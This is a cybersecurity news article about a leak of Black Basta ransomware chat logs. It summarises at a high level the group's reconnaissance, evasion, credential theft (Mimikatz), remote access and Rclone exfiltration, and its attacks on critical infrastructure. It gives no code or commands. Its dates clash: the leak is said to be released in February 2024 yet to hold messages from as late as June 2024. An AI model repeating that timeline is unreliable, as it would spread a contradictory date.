A significant leak of internal chat logs from the Black Basta ransomware group has provided cybersecurity researchers with unprecedented insight into their operations.
The leak, released on February 11, 2024, by a Telegram user named ExploitWhispers, contained approximately 200,000 chat messages dated between September 2023 and June 20241.
This event rivals the 2022 leaks that affected the Conti ransomware gang, shedding light on one of the most impactful ransomware groups in recent years.
Advanced Tactics and Techniques Revealed
Threat hunters at Intel 471 have updated their threat intelligence with newly uncovered Tactics, Techniques, and Procedures (TTPs) based on the leaked information.
Black Basta’s arsenal includes sophisticated reconnaissance tools, defense evasion techniques, and credential access methods.
The group utilizes discovery tools such as ifconfig.exe, netstat.exe, and ping.exe, while also abusing WMIC for system information gathering.
For defense evasion, Black Basta employs temp directories, abuses the Background Intelligent Transfer Service (BITS), and tampers with Windows Defender.
The group gains credential access through the notorious Mimikatz tool and establishes command and control via the AnyDesk application.
PowerShell abuse is prevalent for file downloads and execution, while data exfiltration is facilitated through the Rclone utility.
Global Impact and Critical Infrastructure Targeting
A joint report from CISA and the FBI, released on May 10, 2024, detailed Black Basta’s major activities between April 2022 and May 2024.
During this period, the group targeted over 500 entities across North America, Europe, and Australia, affecting 12 out of 16 critical infrastructure sectors.
The report highlighted an increased risk to healthcare organizations, noting a surge in attacks targeting this sector due to its size and potential impact.
Black Basta operates under the Ransomware-as-a-Service (RaaS) model and is known for its double extortion tactic.
The group not only encrypts files on victims’ computers or networks but also threatens to publish exfiltrated data publicly.
This Russian-speaking, financially motivated group has targeted numerous countries worldwide, including the United States, Japan, Australia, the United Kingdom, Canada, and New Zealand.
The leaked information and subsequent analysis provide valuable insights for cybersecurity professionals and organizations to bolster their defenses against Black Basta and similar ransomware threats.
As ransomware attacks continue to evolve and target critical infrastructure, understanding the tactics and techniques employed by these groups becomes crucial for developing effective countermeasures and protecting vulnerable sectors.
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Warning for WordPress Admins – Fake SEO Plugins Hijacking Websites")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Apache APISIX Flaw Enables Unauthorized Cross-Issuer Access Due to Misconfigurations")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Instagram Adopts Daily TLS Certificate Rotation with One-Week Validity")
